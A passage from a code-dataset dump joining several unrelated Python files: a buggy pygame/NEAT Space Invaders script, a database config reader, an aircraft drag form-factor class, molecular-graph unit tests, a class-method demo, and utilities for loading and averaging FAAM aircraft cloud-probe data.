\n#Enemy\nenemyimg = []\nenemyimgT = [] \nenemyX = []\nenemyY = []\nenemyX_change = []\nenemyY_change = []\n\nfor i in range(0,6):\n enemyimg.append(pygame.image.load(\"alien.png\"))\n enemyimgT.append(pygame.transform.scale(enemyimg[i], (45, 45)))\n enemyX.append(random.randint(0,755))\n enemyY.append(random.randint(50,200))\n enemyX_change.append(4)\n enemyY_change.append(45)\n\ndef enemy(x,y,i):\n screen.blit(enemyimgT[i],(x,y))\n \n\n#Bullet\nbulletimg = pygame.image.load(\"bullet.png\")\nbulletimg = pygame.transform.scale(bulletimg, (35, 35))\n\nbulletX = 0\nbulletY = 480\nbulletX_change = 0\nbulletY_change = 10\nbullet_state = \"ready\"\n\ndef fire_bullet(x,y):\n global bullet_state\n bullet_state = 'fire'\n screen.blit(bulletimg,(x+5,y+16))\n \n \ndef Collusion(aX,aY,bX,bY):\n distance = math.sqrt(math.pow((aX-bX),2)+math.pow((aY-bY),2))\n if distance <= 25:\n return True\n else:\n return False\n \ndef run(config_file):\n \n # Load configuration.\n config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_file)\n p = neat.Population(config)\n \n # Add a stdout reporter to show progress in the terminal.\n p.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n p.add_reporter(stats)\n \n # Run for up to 300 generations.\n winner = p.run(eval_genomes, 100)\n\nif __name__ == '__main__':\n\n # Determine path to configuration file. This path manipulation is\n # here so that the script will run successfully regardless of the\n # current working directory.\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, 'config-feedforward.txt')\n run(config_path)\n\n\ndef printit():\n threading.Timer(1.0, printit).start()\n genomes.fitness += 0.5\n\n\ndef eval_genomes(genomes, config):\n \n net = neat.nn.FeedForwardNetwork.create(genomes, config)\n genmoes.fitness = 0\n \n\n\n while True:\n \n #increase fitness 0.5 every sec\n printit()\n \n screen.fill((0,0,0))\n screen.blit(background,(0,0))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.display.quit()\n \n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n playerX_change = -5\n \n if event.key == pygame.K_RIGHT:\n playerX_change = 5\n \n if event.key == pygame.K_SPACE:\n if bullet_state is \"ready\":\n bulletX = playerX\n fire_bullet(bulletX,bulletY)\n mixer.music.load(\"laser.wav\")\n mixer.music.play()\n \n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n playerX_change = 0\n \n \n #Player Boundry & Movement\n \n if playerX <= 0:\n playerX = 0\n elif playerX >= 750:\n playerX = 750\n \n playerX += playerX_change\n \n #Neural net\n output = net.activate((playerX,math.sqrt(math.pow((enemyX[0]-playerX[0]),2)+math.pow((enemyY[0]-playerY[0]),2))))\n \n if output >0.5:\n if bullet_state is \"ready\":\n bulletX = playerX\n fire_bullet(bulletX,bulletY)\n mixer.music.load(\"laser.wav\")\n mixer.music.play()\n \n #Bullet Movement\n if bullet_state is \"fire\":\n fire_bullet(bulletX,bulletY)\n bulletY -= bulletY_change\n \n if bulletY <= 0:\n bullet_state = \"ready\"\n bulletY = 480\n \n #Enemy Boundary & Movement\n \n for i in range(0,6):\n \n if enemyY[i]>=480:\n for j in range(0,6):\n enemyY[j]= 2000\n display_gameover()\n break \n \n enemyX[i] += enemyX_change[i] \n if enemyX[i] <= 0:\n enemyX_change[i] = 4\n enemyY[i] += enemyY_change[i]\n elif enemyX[i] >= 750:\n enemyX_change[i] = -4\n enemyY[i] += enemyY_change[0]\n \n colide = Collusion(enemyX[i],enemyY[i],bulletX,bulletY)\n \n enemy(enemyX[i],enemyY[i],i)\n \n if colide:\n bullet_state = \"ready\"\n bulletY = 480\n enemyX[i] = random.randint(0,755)\n enemyY[i]= random.randint(50,200)\n score_value +=1\n genome.fitness +=3\n mixer.music.load(\"explosion.wav\")\n mixer.music.play()\n \n \n display_font(textX,textY)\n player(playerX,playerY) \n pygame.display.update()\n","sub_path":"spaceai.py","file_name":"spaceai.py","file_ext":"py","file_size_in_byte":6284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"542921686","text":"#!/usr/bin/python\nfrom configparser import ConfigParser\n\n\ndef config(filename='db/database.ini', section='postgresql'):\n # create a parser\n parser = ConfigParser()\n # read config file\n parser.read(filename)\n\n # get section, default to postgresql\n db = {}\n if parser.has_section(section):\n params = parser.items(section)\n for param in params:\n db[param[0]] = param[1]\n else:\n raise Exception('Section {0} not found in the {1} file'.format(section, filename))\n\n return db\n\n\ndef startDate(filename='db/database.ini', section='cve'):\n # create a parser\n parser = ConfigParser()\n # read config file\n parser.read(filename)\n\n if parser.has_section(section):\n params = parser.items(section)\n for param in params:\n if param[0] == \"mindate\":\n return param[1]\n\n # User didn't specify oldest date to pull data from\n default_min_date = '01-01-2014'\n return default_min_date\n","sub_path":"db/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"527944294","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\nCopyright: Deutsches Zentrum fuer Luft- und Raumfahrt e.V., 2015 (c)\nContact: daniel.boehnke@dlr.de and jonas.jepsen@dlr.de\n'''\n\nfrom VAMPzero.Handler.Parameter import parameter\n\nclass formFactor(parameter):\n '''\n The parasite drag associated with skin friction and pressure drag is determined \n by incrementing the flat plate results by a factor, to account for \n pressure drag and the higher-than-freestream surface velocities:\n\n :Unit: [ ]\n :Wiki: http://adg.stanford.edu/aa241/drag/formfactor.html \n '''\n\n def __init__(self, value=0., unit='', parent='', cpacsPath=''):\n super(formFactor, self).__init__(value=value, unit=unit, doc=self.__doc__, status='init', parent=parent,\n cpacsPath=cpacsPath)\n\n def calc(self):\n '''\n Calculates the form factor for the engine from length and diameter\n\n :Source: Aircraft Design: A Conceptual Approach, D. P. Raymer, AIAA Education Series, 1992, Second Edition, p. 283, Eq. 12.32\n '''\n dfus = self.parent.dfus.getValue()\n lfus = self.parent.lfus.getValue()\n\n f = lfus / dfus\n \n # limit the form factor to values between 0 and 2 for stability of convergence\n formFactor = 1 + 60. / f ** 3 + f / 400.\n if formFactor < 0.0:\n self.log.warning(\"VAMPzero AERO: The fuselages form factor is calculated to be less than 0.0. Resetting the value to 0.0.\")\n formFactor = 0.0\n elif formFactor > 2.0:\n self.log.warning(\"VAMPzero AERO: The fuselages form factor is calculated to be more than 2.0. Resetting the value to 2.0.\")\n formFactor = 2.0\n\n return self.setValueCalc(formFactor)\n\n ###################################################################################################\n #EOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFE#\n ###################################################################################################","sub_path":"src/VAMPzero/Component/Fuselage/Aerodynamic/formFactor.py","file_name":"formFactor.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"597631255","text":"import numpy as np\nimport torch\n\nfrom dgllife.utils.featurizers import *\nfrom dgllife.utils.mol_to_graph import *\nfrom rdkit import Chem\n\ntest_smiles1 = 'CCO'\ntest_smiles2 = 'Fc1ccccc1'\n\nclass TestAtomFeaturizer(BaseAtomFeaturizer):\n def __init__(self):\n super(TestAtomFeaturizer, self).__init__(\n featurizer_funcs={'hv': ConcatFeaturizer([atomic_number])})\n\nclass TestBondFeaturizer(BaseBondFeaturizer):\n def __init__(self):\n super(TestBondFeaturizer, self).__init__(\n featurizer_funcs={'he': ConcatFeaturizer([bond_is_in_ring])})\n\ndef test_smiles_to_bigraph():\n # Test the case with self loops added.\n g1 = smiles_to_bigraph(test_smiles1, add_self_loop=True)\n src, dst = g1.edges()\n assert torch.allclose(src, torch.LongTensor([0, 2, 2, 1, 0, 1, 2]))\n assert torch.allclose(dst, torch.LongTensor([2, 0, 1, 2, 0, 1, 2]))\n\n # Test the case without self loops.\n test_node_featurizer = TestAtomFeaturizer()\n test_edge_featurizer = TestBondFeaturizer()\n g2 = smiles_to_bigraph(test_smiles2, add_self_loop=False,\n node_featurizer=test_node_featurizer,\n edge_featurizer=test_edge_featurizer)\n assert torch.allclose(g2.ndata['hv'], torch.tensor([[9.], [6.], [6.], [6.],\n [6.], [6.], [6.]]))\n assert torch.allclose(g2.edata['he'], torch.tensor([[0.], [0.], [1.], [1.], [1.],\n [1.], [1.], [1.], [1.], [1.],\n [1.], [1.], [1.], [1.]]))\n\ndef test_mol_to_bigraph():\n mol1 = Chem.MolFromSmiles(test_smiles1)\n g1 = mol_to_bigraph(mol1, add_self_loop=True)\n src, dst = g1.edges()\n assert torch.allclose(src, torch.LongTensor([0, 2, 2, 1, 0, 1, 2]))\n assert torch.allclose(dst, torch.LongTensor([2, 0, 1, 2, 0, 1, 2]))\n\n # Test the case without self loops.\n mol2 = Chem.MolFromSmiles(test_smiles2)\n test_node_featurizer = TestAtomFeaturizer()\n test_edge_featurizer = TestBondFeaturizer()\n g2 = mol_to_bigraph(mol2, add_self_loop=False,\n node_featurizer=test_node_featurizer,\n edge_featurizer=test_edge_featurizer)\n assert torch.allclose(g2.ndata['hv'], torch.tensor([[9.], [6.], [6.], [6.],\n [6.], [6.], [6.]]))\n assert torch.allclose(g2.edata['he'], torch.tensor([[0.], [0.], [1.], [1.], [1.],\n [1.], [1.], [1.], [1.], [1.],\n [1.], [1.], [1.], [1.]]))\n\ndef test_smiles_to_complete_graph():\n test_node_featurizer = TestAtomFeaturizer()\n g = smiles_to_complete_graph(test_smiles1, add_self_loop=False,\n node_featurizer=test_node_featurizer)\n src, dst = g.edges()\n assert torch.allclose(src, torch.LongTensor([0, 0, 1, 1, 2, 2]))\n assert torch.allclose(dst, torch.LongTensor([1, 2, 0, 2, 0, 1]))\n assert torch.allclose(g.ndata['hv'], torch.tensor([[6.], [8.], [6.]]))\n\ndef test_mol_to_complete_graph():\n test_node_featurizer = TestAtomFeaturizer()\n mol1 = Chem.MolFromSmiles(test_smiles1)\n g = mol_to_complete_graph(mol1, add_self_loop=False,\n node_featurizer=test_node_featurizer)\n src, dst = g.edges()\n assert torch.allclose(src, torch.LongTensor([0, 0, 1, 1, 2, 2]))\n assert torch.allclose(dst, torch.LongTensor([1, 2, 0, 2, 0, 1]))\n assert torch.allclose(g.ndata['hv'], torch.tensor([[6.], [8.], [6.]]))\n\ndef test_k_nearest_neighbors():\n coordinates = np.array([[0.1, 0.1, 0.1],\n [0.2, 0.1, 0.1],\n [0.15, 0.15, 0.1],\n [0.1, 0.15, 0.16],\n [1.2, 0.1, 0.1],\n [1.3, 0.2, 0.1]])\n neighbor_cutoff = 1.\n max_num_neighbors = 2\n srcs, dsts, dists = k_nearest_neighbors(coordinates, neighbor_cutoff, max_num_neighbors)\n assert srcs == [2, 3, 2, 0, 0, 1, 0, 2, 5, 4]\n assert dsts == [0, 0, 1, 1, 2, 2, 3, 3, 4, 5]\n assert dists == [0.07071067811865474,\n 0.07810249675906654,\n 0.07071067811865477,\n 0.1,\n 0.07071067811865474,\n 0.07071067811865477,\n 0.07810249675906654,\n 0.07810249675906654,\n 0.14142135623730956,\n 0.14142135623730956]\n\nif __name__ == '__main__':\n test_smiles_to_bigraph()\n test_mol_to_bigraph()\n test_smiles_to_complete_graph()\n test_mol_to_complete_graph()\n test_k_nearest_neighbors()\n","sub_path":"apps/life_sci/tests/utils/test_mol_to_graph.py","file_name":"test_mol_to_graph.py","file_ext":"py","file_size_in_byte":4768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"619326691","text":"#!/usr/bin/env python\r\n# -*- coding:utf-8 -*- \r\n#====#====#====#==== \r\n#Author:\r\n#CreatDate:\r\n#Version: \r\n#====#====#====#====\r\nclass Maker():\r\n age=18\r\n a=18\r\n def test(self):\r\n print(\"test\")\r\n self.age=20\r\n\r\n #定义类方法\r\n @classmethod\r\n def mytest(cls):\r\n cls.a=88\r\n print(\"我是类方法\")\r\n\r\n# m=Maker()\r\n# m.test()\r\n# Maker().test()\r\n# Maker().mytest()\r\n# Maker.mytest()#调用类方法\r\n# # Maker.test()报错\r\n#\r\n# print(m.age)\r\n# m.test()\r\n# print(m.age)\r\n# m1=Maker()\r\n# print(m1.age)\r\nprint(\"----------\")\r\nm2=Maker()\r\nprint(m2.a)\r\nMaker.mytest()\r\nprint(m2.a)\r\n\r\nm3=Maker()\r\nprint(m3.a)\r\n\r\n\r\n","sub_path":"base/10day/10类方法.py","file_name":"10类方法.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"316959946","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 21 09:54:16 2018\n\n@author: Admin TEMP\n\"\"\"\nimport datetime\nimport numpy as np\nfrom netCDF4 import Dataset\nimport math\nimport bisect\nimport h5py\nimport scipy.io as sio\nimport matplotlib.pyplot as plt \nimport matplotlib.dates as mdates\nimport matplotlib.colors as colors\nfrom matplotlib.mlab import bivariate_normal\nfrom matplotlib.dates import DateFormatter\nimport os\nimport pandas as pd\n\n#__________________________________________________________________________________________________\n#Bin DataY based on DataX value\n\n\n#def BinLinear(DataY,DataX,StartBin,EndBin, NBins):\n# Output=np.zeros((len(DataX),NBins))*np.nan\n# bins = np.linspace(StartBin,EndBin, NBins)\n# \n# digitized = np.digitize(DataX, bins)\n# \n# for i in range(len(DataY)-1):\n# if DataX[i]>=StartBin and DataX[i]=StartBin and DataX[i] Threshold)\n\n#__________________________________________________________________________________________________\n\ndef remove_prefix(text, prefix):\n return text[text.startswith(prefix) and len(prefix):]\n#__________________________________________________________________________________________________\n\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n\n#__________________________________________________________________________________________________\n\n\n\ndef DateTime2IgorTime(DateTimeArray):\n dt_base = datetime.datetime(1904, 1, 1, 0, 0, 0)\n #IgorTime = (DateTimeArray - dt_base).total_seconds()\n \n IgorTime= [(DateTimeArray[x]-dt_base).total_seconds() for x in range(len(DateTimeArray))] \n return IgorTime\n\n#__________________________________________________________________________________________________\n\ndef Igor2DateTime(IgorTime):\n dt_base = datetime.datetime(1904, 1, 1, 0, 0, 0)\n Dt= [dt_base + datetime.timedelta(seconds=IgorTime[x]) for x in range(len(IgorTime))]\n return Dt\n\n#__________________________________________________________________________________________________\n\ndef loadTAS(FullPath,FAAMCoreName):\n FAAMCore = Dataset(FullPath+FAAMCoreName)\n Time=np.array(FAAMCore['Time'][:])\n TAS_RVSM=np.array(FAAMCore['TAS_RVSM'][:])\n TAS_RVSM_FLAG=np.array(FAAMCore['TAS_RVSM_FLAG'][:])\n dt_base = datetime.datetime(1904, 1, 1, 0, 0, 0)\n FlightDate= datetime.datetime(int(FAAMCoreName[10:14]), int(FAAMCoreName[14:16]), int(FAAMCoreName[16:18]), 0, 0, 0)\n print(FlightDate)\n TotalSeconds = (FlightDate - dt_base).total_seconds()\n DateTime=TotalSeconds+Time\n TAS_RVSM[TAS_RVSM_FLAG!=0]=np.nan\n \n return TAS_RVSM, DateTime\n\n#__________________________________________________________________________________________________\n#\n\n#FullPath='C:/Users/Admin TEMP/Documents/PICASSO/Flights/FAAM_Data/c082-feb-14/core_processed/'\n#FAAMCoreName='core_faam_20180214_v004_r0_c082_1hz.nc'\n\ndef loadFAAMCore(FullPath,FAAMCoreName):\n FAAMCore = Dataset(FullPath+FAAMCoreName)\n Time=np.array(FAAMCore['Time'][:])\n FlightDate= datetime.datetime(int(FAAMCoreName[10:14]), int(FAAMCoreName[14:16]), int(FAAMCoreName[16:18]), 0, 0, 0)\n Time_Core= [FlightDate + datetime.timedelta(seconds=int(Time[x])) for x in range(len(Time))]\n VariableNames=FAAMCore.variables.keys() \n \n #print(VariableNames) \n FAAMCoreDict={}\n for NameStr in VariableNames: \n if not (NameStr.endswith('_FLAG')) and (NameStr!='Time') :\n# print(NameStr)\n CoreVariable=np.array(FAAMCore[NameStr][:])\n if NameStr+'_FLAG' in VariableNames:\n CoreVariableFlag=np.array(FAAMCore[NameStr+'_FLAG'][:])\n CoreVariable[CoreVariableFlag!=0]=np.nan\n FAAMCoreDict[NameStr]=CoreVariable\n\n FAAMCoreDict['Time_Core']= Time_Core \n \n TAT_DI_R_C=np.array(FAAMCore['TAT_DI_R'][:])\n TAT_DI_R_C-=273.15\n TAT_ND_R_C=np.array(FAAMCore['TAT_ND_R'][:])\n TAT_ND_R_C-=273.15\n \n FAAMCoreDict['TAT_ND_R_C']=TAT_ND_R_C\n FAAMCoreDict['TAT_DI_R_C']=TAT_DI_R_C \n \n \n return FAAMCoreDict \n \n #TAT_DI_R=np.array(FAAMCore['TAT_DI_R'][:])\n #TAT_DI_R_FLAG=np.array(FAAMCore['TAT_DI_R_FLAG'][:])\n #TAT_DI_R[TAT_DI_R_FLAG!=0]=np.nan\n #TAT_DI_R\n\n\n\n \n\n\n#__________________________________________________________________________________________________\n\n\ndef LoadCoreCloud(CoreCloudPath,CoreCloudFile,CdpCalPath,CdpCalFile):\n\n CoreCloud = Dataset(CoreCloudPath+CoreCloudFile)\n \n #load bin sizes\n BinSize = np.loadtxt(CdpCalPath+CdpCalFile,skiprows=9,usecols=range(1,31),delimiter=',')\n CDP_BinCentre=BinSize[0][:]\n CDP_BinWidth=BinSize[2][:]\n #CDP_LogCentre=BinSize[4][:]\n #CDP_LogWidth=BinSize[6][:]\n\n #Load CDP\n CDP_FLAG= np.array(CoreCloud['CDP_FLAG'][:])\n for i in range(1, 31):\n if(i<10):\n i_string = 'CDP_0' + str(i)\n else:\n i_string = 'CDP_'+ str(i)\n # print(i_string) \n CDP_bin = np.array(CoreCloud[i_string][:])\n CDP_bin[CDP_FLAG!=0]=np.nan\n if (i==1):\n CDP_Matrix=np.array(CDP_bin)\n else:\n CDP_Matrix=np.column_stack([CDP_Matrix, CDP_bin])\n\n FlightDate= datetime.datetime(int(CoreCloudFile[20:24]), int(CoreCloudFile[24:26]), int(CoreCloudFile[26:28]), 0, 0, 0)\n CDP_TSPM= np.array(CoreCloud['CDP_TSPM'][:])\n CDP_time_mid= [FlightDate + datetime.timedelta(seconds=int(CDP_TSPM[x])) for x in range(len(CDP_TSPM))]\n CDP_cm3=np.sum(CDP_Matrix,axis=1)\n CDP_dNdDp= CDP_Matrix / CDP_BinWidth\n CDP_gcm3=np.sum(CDP_Matrix*(4/3)*math.pi*(CDP_BinCentre/2e4)**3, axis=1)\n\n return CDP_time_mid, CDP_cm3, CDP_dNdDp, CDP_gcm3, CDP_BinCentre\n\n\n\n#__________________________________________________________________________________________________\n\n\ndef ChangeBaseAvg(t1,w1,tdes, max_avg_window):\n wdes=np.zeros(len(tdes))*np.nan\n #max_avg_window=1 # max difference in time that could be averaged\n counts=np.zeros(len(wdes))\n if (len(w1)==len(t1)) and (len(wdes)==len(tdes)): # check wave lengths are correct \n for i in range(len(w1)): \n if(w1[i]==w1[i]):\n match=bisect.bisect_left(tdes, t1[i]) # assume is sorted, which it should be \n if (np.sqrt((t1[i]-tdes[match])**2) < max_avg_window)\t:\t\n if (counts[match]==0):\n wdes[match]=w1[i]\n else:\n wdes[match]+=w1[i]\n counts[match]+=1\n\n wdes/=counts \n return(wdes)\n else:\n print(\"Array lengths incorrect\")\n\n#__________________________________________________________________________________________________\n\n# t1_dt and tdes_dt are DateTime arrays. w1 is numpy array\n\ndef ChangeTimeBaseAvg(t1_dt,w1,tdes_dt, max_avg_window):\n \n t1=DateTime2IgorTime(t1_dt)\n tdes=DateTime2IgorTime(tdes_dt)\n \n wdes=np.zeros(len(tdes))*np.nan\n #max_avg_window=1 # max difference in time that could be averaged\n counts=np.zeros(len(wdes))\n if (len(w1)==len(t1)) and (len(wdes)==len(tdes)): # check wave lengths are correct \n for i in range(len(w1)-1): \n if(w1[i]==w1[i]):\n match=bisect.bisect_left(tdes, t1[i]) # assume is sorted, which it should be \n \n if (match < len(tdes)-1):\n if (np.absolute(t1[i]-tdes[match]) < max_avg_window)\t:\t\n if (counts[match]==0):\n wdes[match]=w1[i]\n else:\n wdes[match]+=w1[i]\n counts[match]+=1\n\n wdes/=counts \n return(wdes)\n else:\n print(\"Array lengths incorrect\")\n\n\n#__________________________________________________________________________________________________\n\n#x= time dimension\n#y= e.g. size \n# uses x to sort \n\n\ndef ChangeTimeBase2DAvg(t1_dt,w1,tdes_dt, max_avg_window):\n \n t1=DateTime2IgorTime(t1_dt)\n tdes=DateTime2IgorTime(tdes_dt)\n \n wdes=np.zeros((len(tdes),len(w1[0,:])))*np.nan\n #max_avg_window=1 # max difference in time that could be averaged\n counts=np.zeros((len(wdes),len(w1[0,:])))\n if (len(w1)==len(t1)) and (len(wdes)==len(tdes)): # check wave lengths are correct \n for i in range(len(w1)): \n if(w1[i,0]==w1[i,0]):\n match=bisect.bisect_left(tdes, t1[i]) # assume is sorted, which it should be \n if (np.sqrt((t1[i]-tdes[match])**2) < max_avg_window)\t:\t\n if (counts[match,0]==0):\n wdes[match,:]=w1[i,:]\n else:\n wdes[match,:]+=w1[i,:]\n counts[match,:]+=1\n\n wdes/=counts \n return(wdes)\n else:\n print(\"Array lengths incorrect\")\n \n \n#__________________________________________________________________________________________________\n\n#NevPath='C:/Users/Admin TEMP/Documents/PICASSO/Flights/FAAM_Data/c082-feb-14/Nevzorov/'\n#NevName='c081_nevzorov_20180213_1hz_r0.nc'\n\ndef LoadNevzorov(NevPath,NevName):\n NevData = Dataset(NevPath+NevName)\n #print(NevData.variables.keys())\n #return NevData\n Time=np.array(NevData['TIME'][:])\n TWC_g_m3=np.array(NevData['TWC'][:])\n LWC_g_m3=np.array(NevData['LWC'][:])\n FlightDate= datetime.datetime(int(NevName[14:18]), int(NevName[18:20]), int(NevName[20:22]), 0, 0, 0)\n TimeNev= [FlightDate + datetime.timedelta(seconds=int(Time[x])) for x in range(len(Time))]\n TimeNevIgor=DateTime2IgorTime(TimeNev)\n \n \n return TWC_g_m3, LWC_g_m3, TimeNev, TimeNevIgor\n\n#__________________________________________________________________________________________________\n\ndef LoadOAP(FilePath,FileNameOAP): \n \n DataOAP = h5py.File(FilePath+FileNameOAP, 'r')\n NC_all_x=np.array(DataOAP['NC_all_x'])\n NC_all_y=np.array(DataOAP['NC_all_y'])\n NC_all_z=np.array(DataOAP['NC_all_z']) \n NC_S_z=np.array(DataOAP['NC_S_z']) \n NC_LI_z=np.array(DataOAP['NC_LI_z']) \n NC_MI_z=np.array(DataOAP['NC_MI_z']) \n NC_HI_z=np.array(DataOAP['NC_HI_z'])\n NC_All_accept_CH0_z=np.array(DataOAP['NC_All_accept_CH0_z'])\n NC_All_accept_CH1_z=np.array(DataOAP['NC_All_accept_CH1_z'])\n DataOAP.close()\n \n NC_All_accept_total=np.sum(NC_All_accept_CH0_z,axis=1)\n NC_HI_total=np.sum(NC_HI_z,axis=1)\n NC_MI_total=np.sum(NC_MI_z,axis=1)\n NC_LI_total=np.sum(NC_LI_z,axis=1)\n\n #Calculate DateTime\n NC_sMidnight=(NC_all_x[:-1:1]+NC_all_x[1::1])/2\n FlightDate= datetime.datetime(int(FileNameOAP[5:9]), int(FileNameOAP[9:11]), int(FileNameOAP[11:13]), 0, 0, 0)\n NC_DateTime= [FlightDate + datetime.timedelta(seconds=int(NC_sMidnight[x])) for x in range(len(NC_sMidnight))]\n\n return NC_All_accept_total,NC_HI_total,NC_MI_total,NC_LI_total,NC_all_x, NC_all_y, NC_all_z, NC_LI_z, NC_MI_z, NC_HI_z, NC_All_accept_CH0_z, NC_All_accept_CH1_z, NC_DateTime\n\n\n#__________________________________________________________________________________________________\n\ndef round_time(dt=None, dateDelta=datetime.timedelta(minutes=1), to='average'):\n \"\"\"Round a datetime object to a multiple of a timedelta\n dt : datetime.datetime object, default now.\n dateDelta : timedelta object, we round to a multiple of this, default 1 minute.\n Author: Thierry Husson 2012 - Use it as you want but don't blame me.\n Stijn Nevens 2014 - Changed to use only datetime objects as variables\n \"\"\"\n round_to = dateDelta.total_seconds()\n\n if dt == None : dt = datetime.datetime.now()\n seconds = (dt - dt.min).seconds\n # // is a floor division, not a comment on following line:\n if to == 'up':\n # // is a floor division, not a comment on following line (like in javascript):\n rounding = (seconds + round_to) // round_to * round_to\n elif to == 'down':\n rounding = seconds // round_to * round_to\n else:\n rounding = (seconds + round_to / 2) // round_to * round_to\n return dt + datetime.timedelta(0,rounding-seconds,-dt.microsecond)\n\n\n#__________________________________________________________________________________________________\n\ndef Average_nPts(Array,nPts):\n \n ArrayAvg=np.nanmean(np.pad(Array.astype(float), (0, nPts - Array.size%nPts), mode='constant', constant_values=np.NaN).reshape(-1, nPts), axis=1)\n return ArrayAvg\n\n#__________________________________________________________________________________________________\n\ndef Average_nPts_datetime(DateTimeArray,nPts):\n \n Array=np.asarray(DateTime2IgorTime(DateTimeArray))\n ArrayAvg=np.nanmean(np.pad(Array.astype(float), (0, nPts - Array.size%nPts), mode='constant', constant_values=np.NaN).reshape(-1, nPts), axis=1)\n DateTimeArrayAvg=Igor2DateTime(ArrayAvg)\n \n return DateTimeArrayAvg\n\n\n#__________________________________________________________________________________________________\n# average every nPts points in x dimension. y dimension size remains the same\n\n\ndef Average_nPts_2D(Array,nPts):\n \n nx=float(Array.shape[0])\n ny=Array.shape[1]\n\n \n ArrayAvg=np.zeros((int(np.ceil(nx/nPts)),ny))*np.nan\n \n for i in range(int(np.ceil(nx/nPts))-1):\n Slice=Array[i*nPts:(i+1)*nPts,:]\n #SliceAvg=np.nanmean(Slice,axis=0)\n ArrayAvg[i,:]=np.nanmean(Slice,axis=0)\n \n return ArrayAvg\n \n\n#__________________________________________________________________________________________________\n#\n\ndef haversine(lon1, lat1, lon2, lat2):\n \"\"\"\n Calculate the great circle distance between two points \n on the earth (specified in decimal degrees)\n \"\"\"\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(math.radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = math.sin(dlat/2)**2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon/2)**2\n c = 2 * math.asin(math.sqrt(a)) \n # Radius of earth in kilometers is 6371\n km = 6371* c\n return km\n\n#__________________________________________________________________________________________________\n\n\ndef BinMid_2_Width(BinMid):\n \n Width=np.zeros(len(BinMid))\n WidthTmp=(BinMid[1:-1:1]-BinMid[0:-2:1])/2+(BinMid[2::1]-BinMid[1:-1:1])/2\n Width[1:-1]=WidthTmp\n Width[0]=WidthTmp[0]\n Width[len(Width)-1]=WidthTmp[len(WidthTmp)-1]\n\n #Width=np.zeros(len(BinMid))\n return Width\n\n#__________________________________________________________________________________________________\n\ndef loadmat(filename):\n '''\n this function should be called instead of direct spio.loadmat\n as it cures the problem of not properly recovering python dictionaries\n from mat files. It calls the function check keys to cure all entries\n which are still mat-objects\n \n from: `StackOverflow `_\n '''\n data = sio.loadmat(filename, struct_as_record=False, squeeze_me=True)\n return _check_keys(data)\n\n#__________________________________________________________________________________________________\n\ndef _check_keys(dict):\n '''\n checks if entries in dictionary are mat-objects. If yes\n todict is called to change them to nested dictionaries\n '''\n for key in dict:\n if isinstance(dict[key], sio.matlab.mio5_params.mat_struct):\n dict[key] = _todict(dict[key])\n return dict \n#__________________________________________________________________________________________________\n\ndef _todict(matobj):\n '''\n A recursive function which constructs from matobjects nested dictionaries\n '''\n dict = {}\n for strg in matobj._fieldnames:\n elem = matobj.__dict__[strg]\n if isinstance(elem, sio.matlab.mio5_params.mat_struct):\n dict[strg] = _todict(elem)\n else:\n dict[strg] = elem\n return dict\n\n\n\n#print_mat_nested(matdata, nkeys=6)\n\n#__________________________________________________________________________________________________\n\ndef Matlab2PythonTime(matlab_datenum):\n python_datetime = datetime.datetime.fromordinal(int(matlab_datenum)) + datetime.timedelta(days=matlab_datenum%1) - datetime.timedelta(days = 366)\n return python_datetime\n\n#__________________________________________________________________________________________________\n\ndef Matlab2PythonTimeArray(matlab_datenum_array):\n F_array = np.vectorize(Matlab2PythonTime)\n PythonTimeArray=F_array(matlab_datenum_array)\n\n return PythonTimeArray\n\n#__________________________________________________________________________________________________\n\n#plt.xlim(['2018-02-13 06:35:00','2018-02-13 06:36:00'])\n\n\ndef TimeSeriesPlot(TimeArray, YArray, TimeStart, TimeEnd, Ymin, Ymax):\n \n \n fig=plt.figure(figsize=(10,5)) \n plt.rcParams.update({'font.size': 10})\n formatter = DateFormatter('%H:%M')\n \n plt.subplot(1, 1, 1)\n #plt.title(FlightNumber)\n \n plt.plot(TimeArray, YArray)\n \n plt.gca().xaxis.set_major_locator(mdates.HourLocator() )\n plt.gca().xaxis.set_minor_locator(mdates.MinuteLocator(30) )\n plt.gcf().axes[0].xaxis.set_major_formatter(formatter)\n plt.xlabel('time') \n #plt.xlim(['2018-02-13 06:35:00','2018-02-13 06:36:00'])\n plt.xlim([TimeStart,TimeEnd])\n plt.ylim([Ymin, Ymax])\n\n\n#__________________________________________________________________________________________________\n\n#Diameter correction from Reuter and Bakan 1997\n\ndef ReuterBakanDiameter(Diameter25,AreaFraction0): \n\n C = 0.962\n D = -10.34\n E = 1.444 \n F = 